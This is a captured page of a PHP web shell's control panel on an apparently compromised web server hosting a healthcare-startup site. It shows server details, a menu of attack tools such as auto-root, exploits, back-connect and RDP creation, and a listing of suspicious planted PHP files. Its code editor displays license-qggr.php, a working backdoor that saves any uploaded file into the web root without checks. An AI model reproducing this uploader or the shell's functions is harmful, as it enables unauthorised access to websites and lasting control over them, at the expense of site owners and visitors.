Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
healthcarestartup.io /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
9c6ae
[ DIR ]
dr-xr-xr-x
assets
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
e8a348
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
npgctxq
[ DIR ]
drwxr-xr-x
product-images
[ DIR ]
drwxr-xr-x
q1kfsjh
[ DIR ]
drwxr-xr-x
sqomjzi
[ DIR ]
drwxr-xr-x
tmwroky
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
about.html
23.46
KB
-rw-r--r--
accreditation.html
25
KB
-rw-r--r--
admin.css
17.21
KB
-rw-r--r--
admin.html
26.85
KB
-rw-r--r--
admin.js
86.34
KB
-rw-r--r--
billing.html
13.9
KB
-rw-r--r--
blog-detail.html
8.18
KB
-rw-r--r--
blogs.html
11.83
KB
-rw-r--r--
coaching-programs.html
18.35
KB
-rw-r--r--
contact.html
15.68
KB
-rw-r--r--
content-data.js
9.02
KB
-rw-r--r--
defaults.php
1.72
KB
-r--r--r--
ecosystem.config.cjs
257
B
-rw-r--r--
fhyutyvcc.php
143.87
KB
-rw-r--r--
google2f3bfd23e0970042.html
53
B
-rw-r--r--
index.php
12.41
KB
-r-xr-xr-x
license-qggr.php
629
B
-rw-r--r--
licensing-startup.html
21.42
KB
-rw-r--r--
options.php
1.29
KB
-r--r--r--
order-complete.html
9.24
KB
-rw-r--r--
php.ini
106
B
-rw-r--r--
policy-and-procedure-manuals.h...
21.76
KB
-rw-r--r--
product-detail.html
7.77
KB
-rw-r--r--
robots.txt
410
B
-r--r--r--
script.js
86.17
KB
-rw-r--r--
server.js
81.04
KB
-rw-r--r--
styles.css
193.57
KB
-rw-r--r--
training.html
23.44
KB
-rw-r--r--
wp-log1n.php
2.03
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-qggr.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> cfc77dec35cb4842 <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close